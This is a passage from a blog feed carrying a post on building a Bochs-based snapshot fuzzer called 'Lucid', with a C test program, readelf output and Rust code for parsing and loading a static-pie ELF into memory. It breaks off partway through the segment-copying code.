will also need to implement context switching from fuzzer-to-Bochs as well, but for now let’s focus on syscalls.]]></summary></entry><entry><title type="html">Fuzzer Development 1: The Soul of a New Machine</title><link href="https://h0mbre.github.io/New_Fuzzer_Project/" rel="alternate" type="text/html" title="Fuzzer Development 1: The Soul of a New Machine" /><published>2023-11-04T00:00:00+00:00</published><updated>2023-11-04T00:00:00+00:00</updated><id>https://h0mbre.github.io/New_Fuzzer_Project</id><content type="html" xml:base="https://h0mbre.github.io/New_Fuzzer_Project/"><![CDATA[<h2 id="introduction--credit-to-gamozolabs">Introduction &amp;&amp; Credit to Gamozolabs</h2>
<p>For a long time I’ve wanted to develop a fuzzer on the blog during my weekends and freetime, but for one reason or another, I could never really conceptualize a project that would be not only worthwhile as an educational tool, but also offer <em>some</em> utility to the fuzzing community in general. Recently, for Linux Kernel exploitation reasons, I’ve been very interested in <a href="https://nyx-fuzz.com/">Nyx</a>. Nyx is a KVM-based hypervisor fuzzer that you can use to snapshot fuzz traditionally hard to fuzz targets. A lot of the time (most of the time?), we want to fuzz things that don’t naturally lend themselves well to traditional fuzzing approaches. When faced with target complexity in fuzzing (leaving input generation and nuance aside for now), there have generally been two approaches.</p>

<p>One approach is to lobotomize the target such that you can isolate a small subset of the target that you find “interesting” and only fuzz that. That can look like a lot of things, such as ripping a small portion of a Kernel subsystem out of the kernel and compiling it into a userland application that can be fuzzed with traditional fuzzing tools. This could also look like taking an input parsing routine out of a Web Browser and fuzzing just the parsing logic. This approach has its limits though, in an ideal world, we want to fuzz anything that may come in contact with or be affected by the artifacts of this “interesting” target logic. This lobotomy approach is reducing the amount of target state we can explore to a large degree. Imagine if the hypothetical parsing routine successfully produces a data structure that is later consumed by separate target logic that actually reveals a bug. This fuzzing approach fails to explore that possibility.</p>

<p>Another approach, is to effectively sandbox your target in such a way that you can exert some control over its execution environment and fuzz the target in its entirety. This is the approach that fuzzers like Nyx take. By snapshot fuzzing an entire Virtual Machine, we are able to fuzz complex targets such as a Web Browser or Kernel in a way that we are able to explore much more state. Nyx provides us with a way to snapshot fuzz an entire Virtual Machine/system. This is, in my opinion, the ideal way to fuzz things because you are drastically closing the gap between a contrived fuzzing environment and how the target applications exist in the “real-world”. Now obviously there are tradeoffs here, one being the complexity of the fuzzing tooling itself. But, I think given the propensity of complex native code applications to harbor infinite bugs, the manual labor and complexity are worth it in order to increase the bug-finding potential of our fuzzing workflow.</p>

<p>And so, in my pursuit of understanding how Nyx works so that I could build a fuzzer ontop of it, I revisited <a href="https://twitter.com/gamozolabs">gamozolabs (Brandon Falk’s)</a> stream <a href="https://www.youtube.com/watch?v=JpU-jrFnmfE">paper review</a> he did on the <a href="https://nyx-fuzz.com/papers/">Nyx paper</a>. It’s a great stream, the Nyx authors were present in Twitch chat and so there were some good back and forths and the stream really highlights what an amazing utility Nyx is for fuzzing. But something <em>else</em> besides Nyx piqued my interest during the stream! During the stream, Gamozo described a fuzzing architecture he had previously built that utilized the Bochs emulator to snapshot fuzz complex targets and entire systems. This architecture sounded extremely interesting and clever to me, and coincidentally it had several attributes in common with a sandboxing utility I had been designing with a friend for fuzzing as well.</p>

<p>This fuzzing architecture seemed to meet several criteria that I personally value when it comes to doing a fuzzer development project on the blog:</p>
<ul>
  <li>it is relatively simple in its design,</li>
  <li>it allows for almost endless introspection utilities to be added,</li>
  <li>it lends itself well to iterative development cycles,</li>
  <li>it can scale and be used on my servers I bought for fuzzing (but haven’t used yet because I don’t have a fuzzer!),</li>
  <li>it can fuzz the Linux Kernel,</li>
  <li>it can fuzz userland and kernel components on other OSes and platforms (Windows, MacOS),</li>
  <li>it is pretty unique in its design compared to open source fuzzing tools that exist,</li>
  <li>it can be designed from scratch to work well with existing flexible tooling such as LibAFL,</li>
  <li>there is no source code available anywhere publicly, so I’m free to implement it from scratch the way I see fit,</li>
  <li>it can be made to be portable, ie, there is nothing stopping us for running this fuzzer on Windows instead of just Linux,</li>
  <li>it will allow me to do a lot of learning and low-level computing research and learning.</li>
</ul>

<p>So all things considered, this seemed like the ideal project to implement on the blog and so I reached out to Gamozo to make sure he’d be ok with it as I didn’t want to be seen as clout chasing off of his ideas and he was very charitable and encouraged me to do it. So huge thanks to Gamozo for sharing so much content and we’re off to developing the fuzzer.</p>

<p>Also huge shoutout to <a href="https://twitter.com/is_eqv">@is_eqv</a> and <a href="https://twitter.com/ms_s3c">@ms_s3c</a> at least two of the Nyx authors who are always super friendly and charitable with their time/answering questions. Some great people to have around.</p>

<p>Another huge shoutout to <a href="https://twitter.com/Kharosx0">@Kharosx0</a> for helping me understand Bochs and for answering all my questions about my design intentions, another very charitable person who is always helping out on the Fuzzing discord.</p>

<h2 id="misc">Misc</h2>
<p>Please let me know if you find any programming errors or have some nitpicks with the code. I’ve tried to heavily comment everything, and given that I cobbled this together over the course of a couple of weekends, there are probably some issues with the code. I also haven’t really fleshed out how the repository will look, or what files will be called, or anything like that so please be patient with the code-quality. This is mostly for learning purposes and at this point it is just a proof-of-concept of loading Bochs into memory to explain the first portion of the architecture.</p>

<p>I’ve decided to name the project “Lucid” for now, as reference to lucid dreaming since our fuzz target is in somewhat of a dream state being executed within a simulator.</p>

<h2 id="bochs">Bochs</h2>
<p>What is Bochs? Good question. <a href="https://bochs.sourceforge.io/">Bochs</a> is an x86 full-system emulator capable of running an entire operating system with software-simulated hardware devices. In short, it’s a JIT-less, smaller, less-complex emulation tool similar to QEMU but with way less use-cases and way less performant. Instead of taking QEMU’s approach of “let’s emulate anything and everything and do it with good performance”, Bochs has taken the approach of “let’s emulate an entire x86 system 100% in software without worrying about performance for the most part. This approach has its obvious drawbacks, but if you are only interested in running x86 systems, Bochs is a great utility. We are going to use Bochs as the target execution engine in our fuzzer. Our target code will run inside Bochs. So if we are fuzzing the Linux Kernel for instance, that kernel will live and execute inside Bochs. Bochs is written in C++ and apparently still maintained, but do not expect much code changes or rapid development, the last release was over 2 years ago.</p>

<h2 id="fuzzer-architecture">Fuzzer Architecture</h2>
<p>This is where we discuss how the fuzzer will be designed according to the information laid out on stream by Gamozo. In simple terms, we will create a “fuzzer” process, which will execute Bochs, which in turn is executing our fuzz target. Instead of snapshotting and restoring our target each fuzzing iteration, we will reset Bochs which contains the target and all of the target system’s simulated state. By snapshotting and restoring Bochs, we are snapshotting and restoring our target.</p>

<p>Going a bit deeper, this setup requires us to sandbox Bochs and run it inside of our “fuzzer” process. In an effort to isolate Bochs from the user’s OS and Kernel, we will sandbox Bochs so that it cannot interact with our operating system. This allows us to achieve a few things, but chiefly this should make Bochs deterministic. As Gamozo explains on stream, isolating Bochs from the operating system, prevents Bochs from accessing any random/randomish data sources. This means that we will prevent Bochs from making syscalls into the kernel as well as executing any instructions that retrieve hardware-sourced data such as <code class="language-plaintext highlighter-rouge">CPUID</code> or something similar. I actually haven’t given much thought to the latter yet, but syscalls I have a plan for. With Bochs isolated from the operating system, we can expect it to behave the same way each fuzzing iteration. Given Fuzzing Input A, Bochs should execute exactly the same way for 1 trillion successive iterations.</p>

<p>Secondly, it also means that the entirety of Bochs’ state will be contained within our sandbox, which should enable us to reset Bochs’ state more easily instead of it being a remote process. In a paradigm where Bochs executes as intended as a normal Linux process for example, resetting its state is not trivial and may require a heavy handed approach such as page table walking in the kernel for each fuzzing iteration or something even worse.</p>

<p>So in general, this is how our fuzzing setup should look:
<img src="/assets/images/pwn/FuzzingArch.PNG" alt="Fuzzer Architecture" /></p>

<p>In order to provide a sandboxed environment, we must load an executable Bochs image into our own fuzzer process. So for this, I’ve chosen to build Bochs as an ELF and then load the ELF into my fuzzer process in memory. Let’s dive into how that has been accomplished thus far.</p>

<h2 id="loading-an-elf-in-memory">Loading an ELF in Memory</h2>
<p>So in order to make this portion of loading Bochs in memory in the most simplistic way possible, I’ve chosen to compile Bochs as a <code class="language-plaintext highlighter-rouge">-static-pie</code> ELF. Now this means that the built ELF has no expectations about where it is loaded. In its <code class="language-plaintext highlighter-rouge">_start</code> routine, it actually has all of the logic of the normal OS ELF loader necessary to perform all of its own relocations. How cool is that? But before we get too far ahead of ourselves, the first goal will just be to simply build and load a <code class="language-plaintext highlighter-rouge">-static-pie</code> test program and make sure we can do that correctly.</p>

<p>In order to make sure we have everything correctly implemented, we’ll make sure that the test program can correctly access any command line arguments we pass and can execute and exit.</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="cp">#include</span> <span class="cpf">&lt;stdio.h&gt;</span><span class="cp">
#include</span> <span class="cpf">&lt;unistd.h&gt;</span><span class="cp">
</span>
<span class="kt">int</span> <span class="nf">main</span><span class="p">(</span><span class="kt">int</span> <span class="n">argc</span><span class="p">,</span> <span class="kt">char</span> <span class="o">*</span><span class="n">argv</span><span class="p">[])</span> <span class="p">{</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Argument count: %d</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argc</span><span class="p">);</span>
    <span class="n">printf</span><span class="p">(</span><span class="s">"Args:</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
    <span class="k">for</span> <span class="p">(</span><span class="kt">int</span> <span class="n">i</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span> <span class="n">i</span> <span class="o">&lt;</span> <span class="n">argc</span><span class="p">;</span> <span class="n">i</span><span class="o">++</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"   -%s</span><span class="se">\n</span><span class="s">"</span><span class="p">,</span> <span class="n">argv</span><span class="p">[</span><span class="n">i</span><span class="p">]);</span>
    <span class="p">}</span>

    <span class="kt">size_t</span> <span class="n">iters</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
    <span class="k">while</span> <span class="p">(</span><span class="mi">1</span><span class="p">)</span> <span class="p">{</span>
        <span class="n">printf</span><span class="p">(</span><span class="s">"Test alive!</span><span class="se">\n</span><span class="s">"</span><span class="p">);</span>
        <span class="n">sleep</span><span class="p">(</span><span class="mi">1</span><span class="p">);</span>
        <span class="n">iters</span><span class="o">++</span><span class="p">;</span>

        <span class="k">if</span> <span class="p">(</span><span class="n">iters</span> <span class="o">&gt;</span> <span class="mi">5</span><span class="p">)</span> <span class="p">{</span> <span class="k">return</span> <span class="mi">0</span><span class="p">;</span> <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>
</code></pre></div></div>
<p>Remember, at this point we don’t sandbox our loaded program at all, all we’re trying to do at this point is load it in our fuzzer virtual address space and jump to it and make sure the stack and everything is correctly setup. So we could run into issues that aren’t real issues if we jump straight into executing Bochs at this point.</p>

<p>So compiling the <code class="language-plaintext highlighter-rouge">test</code> program and examining it with <code class="language-plaintext highlighter-rouge">readelf -l</code>, we can see that there is actually a <code class="language-plaintext highlighter-rouge">DYNAMIC</code> segment. Likely because of the relocations that need to be performed during the aforementioned <code class="language-plaintext highlighter-rouge">_start</code> routine.</p>

<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="gp">dude@lol:~/lucid$</span><span class="w"> </span>gcc test.c <span class="nt">-o</span> <span class="nb">test</span> <span class="nt">-static-pie</span>
<span class="gp">dude@lol:~/lucid$</span><span class="w"> </span>file <span class="nb">test</span>
<span class="go">test: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, BuildID[sha1]=6fca6026edb756fa32c966844b29529d579e83b9, for GNU/Linux 3.2.0, not stripped
</span><span class="gp">dude@lol:~/lucid$</span><span class="w"> </span>readelf <span class="nt">-l</span> <span class="nb">test</span>
<span class="go">
Elf file type is DYN (Shared object file)
Entry point 0x9f50
There are 12 program headers, starting at offset 64

Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000
  DYNAMIC        0x00000000000c9c18 0x00000000000cac18 0x00000000000cac18
                 0x00000000000001b0 0x00000000000001b0  RW     0x8
  NOTE           0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  NOTE           0x0000000000000300 0x0000000000000300 0x0000000000000300
                 0x0000000000000044 0x0000000000000044  R      0x4
  TLS            0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000000020 0x0000000000000060  R      0x8
  GNU_PROPERTY   0x00000000000002e0 0x00000000000002e0 0x00000000000002e0
                 0x0000000000000020 0x0000000000000020  R      0x8
  GNU_EH_FRAME   0x00000000000ba110 0x00000000000ba110 0x00000000000ba110
                 0x0000000000001cbc 0x0000000000001cbc  R      0x4
  GNU_STACK      0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000000000 0x0000000000000000  RW     0x10
  GNU_RELRO      0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000003220 0x0000000000003220  R      0x1

 Section to Segment mapping:
  Segment Sections...
   00     .note.gnu.property .note.gnu.build-id .note.ABI-tag .gnu.hash .dynsym .dynstr .rela.dyn .rela.plt 
   01     .init .plt .plt.got .plt.sec .text __libc_freeres_fn .fini 
   02     .rodata .stapsdt.base .eh_frame_hdr .eh_frame .gcc_except_table 
   03     .tdata .init_array .fini_array .data.rel.ro .dynamic .got .data __libc_subfreeres __libc_IO_vtables __libc_atexit .bss __libc_freeres_ptrs 
   04     .dynamic 
   05     .note.gnu.property 
   06     .note.gnu.build-id .note.ABI-tag 
   07     .tdata .tbss 
   08     .note.gnu.property 
   09     .eh_frame_hdr 
   10     
   11     .tdata .init_array .fini_array .data.rel.ro .dynamic .got
</span></code></pre></div></div>
<p>So what portions of the this ELF image do we actually care about for our loading purposes? We probably don’t need most of this information to simply get the ELF loaded and running. At first, I didn’t know what I needed so I just parsed all of the ELF headers.</p>

<p>Keeping in mind that this ELF parsing code doesn’t need to be robust, because we are only using it to parse and load our own executable, I simply made sure that there were no glaring issues in the built executable when parsing the various headers.</p>

<h2 id="elf-headers">ELF Headers</h2>
<p>I’ve written ELF parsing code before, but didn’t really remember how it worked so I had to relearn everything from Wikipedia: <a href="https://en.wikipedia.org/wiki/Executable_and_Linkable_Format">https://en.wikipedia.org/wiki/Executable_and_Linkable_Format</a>. Luckily, we’re not trying to parse an arbitrary ELF, just a 64-bit ELF that we built ourselves. The goal is to create a data-structure out of the ELF header information that gives us the data we need to load the ELF in memory. So I skipped some of the ELF header values but ended up parsing the ELF header into the following data structure:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Constituent parts of the Elf</span>
<span class="nd">#[derive(Debug)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">ElfHeader</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">entry</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">phoff</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">shoff</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">phentsize</span><span class="p">:</span> <span class="nb">u16</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">phnum</span><span class="p">:</span> <span class="nb">u16</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">shentsize</span><span class="p">:</span> <span class="nb">u16</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">shnum</span><span class="p">:</span> <span class="nb">u16</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">shrstrndx</span><span class="p">:</span> <span class="nb">u16</span><span class="p">,</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We really care about a few of these struct members. For one, we definitely need to know the <code class="language-plaintext highlighter-rouge">entry</code>, this is where you’re supposed to start executing from. So eventually, our code will jump to this address to start executing the test program. We also care about <code class="language-plaintext highlighter-rouge">phoff</code>. This is the offset into the ELF where we can find the base of the Program Header table. This is just an array of Program Headers basically. Along with <code class="language-plaintext highlighter-rouge">phoff</code>, we also need to know the number of entries in that array and the size of each entry so that we can parse them. That is where <code class="language-plaintext highlighter-rouge">phnum</code> and <code class="language-plaintext highlighter-rouge">phentsize</code> come in handy respectively. Given the offset of index 0 in the array, the number of array members, and the size of each member, we can parse the Program Headers.</p>

<p>A single program header, ie, a single entry in the array, can be synthesized into the following data structure:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nd">#[derive(Debug)]</span>
<span class="k">pub</span> <span class="k">struct</span> <span class="n">ProgramHeader</span> <span class="p">{</span>
    <span class="k">pub</span> <span class="n">typ</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">flags</span><span class="p">:</span> <span class="nb">u32</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">offset</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">vaddr</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">paddr</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">filesz</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">memsz</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span>
    <span class="k">pub</span> <span class="n">align</span><span class="p">:</span> <span class="nb">u64</span><span class="p">,</span> 
<span class="p">}</span>
</code></pre></div></div>

<p>These program headers describe segments in the ELF image as it should exist in memory. In particular, we care about the loadable segments with type <code class="language-plaintext highlighter-rouge">LOAD</code>, as these segments are the ones we have to account for when loading the ELF image. Take our <code class="language-plaintext highlighter-rouge">readelf</code> output for example:</p>
<div class="language-console highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="go">Program Headers:
  Type           Offset             VirtAddr           PhysAddr
                 FileSiz            MemSiz              Flags  Align
  LOAD           0x0000000000000000 0x0000000000000000 0x0000000000000000
                 0x0000000000008158 0x0000000000008158  R      0x1000
  LOAD           0x0000000000009000 0x0000000000009000 0x0000000000009000
                 0x0000000000094d01 0x0000000000094d01  R E    0x1000
  LOAD           0x000000000009e000 0x000000000009e000 0x000000000009e000
                 0x00000000000285e0 0x00000000000285e0  R      0x1000
  LOAD           0x00000000000c6de0 0x00000000000c7de0 0x00000000000c7de0
                 0x0000000000005350 0x0000000000006a80  RW     0x1000
</span></code></pre></div></div>

<p>We can see that there are 4 loadable segments. They also have several attributes we need to be keeping track of:</p>
<ul>
  <li><code class="language-plaintext highlighter-rouge">Flags</code> describes the memory permissions this segment should have, we have 3 distinct memory protection schemes <code class="language-plaintext highlighter-rouge">READ</code>, <code class="language-plaintext highlighter-rouge">READ | EXECUTE</code>, and <code class="language-plaintext highlighter-rouge">READ | WRITE</code></li>
  <li><code class="language-plaintext highlighter-rouge">Offset</code> describes how far into the physical file contents we can expect to find this segment</li>
  <li><code class="language-plaintext highlighter-rouge">PhysAddr</code> we don’t much care about</li>
  <li><code class="language-plaintext highlighter-rouge">VirtAddr</code> the virtual address this segment should be loaded at, you can tell that the first segment value for this is <code class="language-plaintext highlighter-rouge">0x0000000000000000</code> which means that it has no expectations about where it’s to be loaded.</li>
  <li><code class="language-plaintext highlighter-rouge">MemSiz</code> how large the segment should be in virtual memory</li>
  <li><code class="language-plaintext highlighter-rouge">Align</code> how to align the segments in virtual memory</li>
</ul>

<p>For our very simplistic use-case of only loading a <code class="language-plaintext highlighter-rouge">-static-pie</code> ELF that we ourselves create, we can basically ignore all the other portions of the parsed ELF.</p>

<h2 id="loading-the-elf">Loading the ELF</h2>
<p>Now that we’ve successfully parsed out the relevant attributes of the ELF file, we can create an executable image in memory. For now, I’ve chosen to only implement what’s needed in a Linux environment, but there’s no reason why we couldn’t load this ELF into our memory if we happened to be a Windows userland process. That’s kind of why this whole design is cool. At some point, maybe someone will want Windows support and we’ll add it.</p>

<p>The first thing we need to do, is calculate the size of the virtual memory that we need in order to load the ELF based on the combined size of the segments that are marked <code class="language-plaintext highlighter-rouge">LOAD</code>. We also have to keep in mind that there is some padding after the segments that aren’t page aligned, so to do this, I used the following logic:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Read the executable file into memory</span>
<span class="k">let</span> <span class="n">data</span> <span class="o">=</span> <span class="nf">read</span><span class="p">(</span><span class="n">BOCHS_IMAGE</span><span class="p">)</span><span class="nf">.map_err</span><span class="p">(|</span><span class="n">_</span><span class="p">|</span> <span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span>
    <span class="s">"Unable to read binary data from Bochs binary"</span><span class="p">))</span><span class="o">?</span><span class="p">;</span>

<span class="c1">// Parse ELF </span>
<span class="k">let</span> <span class="n">elf</span> <span class="o">=</span> <span class="nf">parse_elf</span><span class="p">(</span><span class="o">&amp;</span><span class="n">data</span><span class="p">)</span><span class="o">?</span><span class="p">;</span>

<span class="c1">// We need to iterate through all of the loadable program headers and </span>
<span class="c1">// determine the size of the address range we need</span>
<span class="k">let</span> <span class="k">mut</span> <span class="n">mapping_size</span><span class="p">:</span> <span class="nb">usize</span> <span class="o">=</span> <span class="mi">0</span><span class="p">;</span>
<span class="k">for</span> <span class="n">ph</span> <span class="k">in</span> <span class="n">elf</span><span class="py">.program_headers</span><span class="nf">.iter</span><span class="p">()</span> <span class="p">{</span>
    <span class="k">if</span> <span class="n">ph</span><span class="nf">.is_load</span><span class="p">()</span> <span class="p">{</span>
        <span class="k">let</span> <span class="n">end_addr</span> <span class="o">=</span> <span class="p">(</span><span class="n">ph</span><span class="py">.vaddr</span> <span class="o">+</span> <span class="n">ph</span><span class="py">.memsz</span><span class="p">)</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">;</span>
        <span class="k">if</span> <span class="n">mapping_size</span> <span class="o">&lt;</span> <span class="n">end_addr</span> <span class="p">{</span> <span class="n">mapping_size</span> <span class="o">=</span> <span class="n">end_addr</span><span class="p">;</span> <span class="p">}</span>
    <span class="p">}</span>
<span class="p">}</span>

<span class="c1">// Round the mapping up to a page</span>
<span class="k">if</span> <span class="n">mapping_size</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span> <span class="o">&gt;</span> <span class="mi">0</span> <span class="p">{</span>
    <span class="n">mapping_size</span> <span class="o">+=</span> <span class="n">PAGE_SIZE</span> <span class="o">-</span> <span class="p">(</span><span class="n">mapping_size</span> <span class="o">%</span> <span class="n">PAGE_SIZE</span><span class="p">);</span>
<span class="p">}</span>
</code></pre></div></div>

<p>We iterate through all of the Program Headers in the parsed ELF, and we just see where the largest “<code class="language-plaintext highlighter-rouge">end_addr</code>” is. This accounts for the page-aligning padding in between segments as well. And as you can see, we also page-align the last segment as well by making sure that the size is rounded up to the nearest page. At this point we know how much memory we need to <code class="language-plaintext highlighter-rouge">mmap</code> to hold the loadable ELF segments. We <code class="language-plaintext highlighter-rouge">mmap</code> a contiguous range of memory here:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Call `mmap` to map memory into our process to hold all of the loadable </span>
<span class="c1">// program header contents in a contiguous range. Right now the perms will be</span>
<span class="c1">// generic across the entire range as PROT_WRITE,</span>
<span class="c1">// later we'll go back and `mprotect` them appropriately</span>
<span class="k">fn</span> <span class="nf">initial_mmap</span><span class="p">(</span><span class="n">size</span><span class="p">:</span> <span class="nb">usize</span><span class="p">)</span> <span class="k">-&gt;</span> <span class="nb">Result</span><span class="o">&lt;</span><span class="nb">usize</span><span class="p">,</span> <span class="n">LucidErr</span><span class="o">&gt;</span> <span class="p">{</span>
    <span class="c1">// We don't want to specify a fixed address</span>
    <span class="k">let</span> <span class="n">addr</span> <span class="o">=</span> <span class="n">LOAD_TARGET</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_void</span><span class="p">;</span>

    <span class="c1">// Length is straight forward</span>
    <span class="k">let</span> <span class="n">length</span> <span class="o">=</span> <span class="n">size</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">size_t</span><span class="p">;</span>

    <span class="c1">// Set the protections for now to writable</span>
    <span class="k">let</span> <span class="n">prot</span> <span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">PROT_WRITE</span><span class="p">;</span>

    <span class="c1">// Set the flags, this is anonymous memory</span>
    <span class="k">let</span> <span class="n">flags</span> <span class="o">=</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_ANONYMOUS</span> <span class="p">|</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_PRIVATE</span><span class="p">;</span>

    <span class="c1">// We don't have a file to map, so this is -1</span>
    <span class="k">let</span> <span class="n">fd</span> <span class="o">=</span> <span class="o">-</span><span class="mi">1</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">c_int</span><span class="p">;</span>

    <span class="c1">// We don't specify an offset </span>
    <span class="k">let</span> <span class="n">offset</span> <span class="o">=</span> <span class="mi">0</span> <span class="k">as</span> <span class="nn">libc</span><span class="p">::</span><span class="nb">off_t</span><span class="p">;</span>

    <span class="c1">// Call `mmap` and make sure it succeeds</span>
    <span class="k">let</span> <span class="n">result</span> <span class="o">=</span> <span class="k">unsafe</span> <span class="p">{</span>
        <span class="nn">libc</span><span class="p">::</span><span class="nf">mmap</span><span class="p">(</span>
            <span class="n">addr</span><span class="p">,</span>
            <span class="n">length</span><span class="p">,</span>
            <span class="n">prot</span><span class="p">,</span>
            <span class="n">flags</span><span class="p">,</span>
            <span class="n">fd</span><span class="p">,</span>
            <span class="n">offset</span>
        <span class="p">)</span>
    <span class="p">};</span>

    <span class="k">if</span> <span class="n">result</span> <span class="o">==</span> <span class="nn">libc</span><span class="p">::</span><span class="n">MAP_FAILED</span> <span class="p">{</span>
        <span class="k">return</span> <span class="nf">Err</span><span class="p">(</span><span class="nn">LucidErr</span><span class="p">::</span><span class="nf">from</span><span class="p">(</span><span class="s">"Failed to `mmap` memory for Bochs"</span><span class="p">));</span>
    <span class="p">}</span>

    <span class="nf">Ok</span><span class="p">(</span><span class="n">result</span> <span class="k">as</span> <span class="nb">usize</span><span class="p">)</span>
<span class="p">}</span>
</code></pre></div></div>

<p>So now we have carved out enough memory to write the loadable segments to. The segment data is sourced from the file of course, and so the first thing we do is once again iterate through the Program Headers and extract all the relevant data we need to do a <code class="language-plaintext highlighter-rouge">memcpy</code> from the file data in memory, to the carved out memory we just created. You can see that logic here:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">let</span> <span class="k">mut</span> <span class="n">load_segments</span> <span class="o">=</span> <span class="nn">Vec</span><span class="p">::</span><span class="nf">new</span><span class="p">();</span>
    <span class="k">for</span> <span class="n">ph</span> <span class="k">in</span> <span class="n">elf</span><span class="py">.program_headers</span><span class="nf">.iter</span><span class="p">()</span> <span class="p">{</span>
        <span class="k">if</span> <span class="n">ph</span><span class="nf">.is_load</span><span class="p">()</span> <span class="p">{</span>
            <span class="n">load_segments</span><span class="nf">.push</span><span class="p">((</span>
                <span class="n">ph</span><span class="py">.flags</span><span class="p">,</span>               <span class="c1">// segment.0</span>
                <span class="n">ph</span><span class="py">.vaddr</span>    <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>   <span class="c1">// segment.1</span>
                <span class="n">ph</span><span class="py">.memsz</span>    <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>   <span class="c1">// segment.2</span>
                <span class="n">ph</span><span class="py">.offset</span>   <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>   <span class="c1">// segment.3</span>
                <span class="n">ph</span><span class="py">.filesz</span>   <span class="k">as</span> <span class="nb">usize</span><span class="p">,</span>   <span class="c1">// segment.4</span>
            <span class="p">));</span>
        <span class="p">}</span>
    <span class="p">}</span>
</code></pre></div></div>

<p>After the segment metadata has been extracted, we can copy the contents over as well as call <code class="language-plaintext highlighter-rouge">mprotect</code> on the segment in memory so that its permissions perfectly match the <code class="language-plaintext highlighter-rouge">Flags</code> segment metadata we discussed earlier. That logic is here:</p>
<div class="language-rust highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c1">// Iterate through the loadable segments and change their perms and then </span>
<span class="c1">// copy the data over</span>
<span class="k">for</span> <span class="n">segment</span> <span class="k">in</span> <span class="n">load_segments</span><span class="nf">.iter</span><span class="p">()</span> <span class="p">{</span>
    <span class="c1">// Copy the binary data over, the destination is where in our process</span>
    <span class="c1">// memory we're copying the binary data to. The source is where we copy</span>
    <span class="c1">// from, this is going to be an offset into the binary data in the file,</span>
    <span class="c1">// len is going to be how much binary data is in the file, that's filesz </span>
    <span class="c1">// This is going to be unsafe no matter what</span>
    <span class="k">let</span> <span class="n">len</span> <span class="o">=</span> <span class="n">segment</span><span class="na">.4</span><span class="p">;</span>
    <span class="k">let</span> <span class="n">dst</span> <span class="o">=</span> <span class="p">(</span><span class="n">addr</span> <span class="o">+</span> <span class="n">segment</span><span class="na">.1</span><span class="p">)</span> <span class="k">as</span> <span class="o">*</span><span class="k">mut</span> <span class="nb">u8</span><span class="p">;</span>
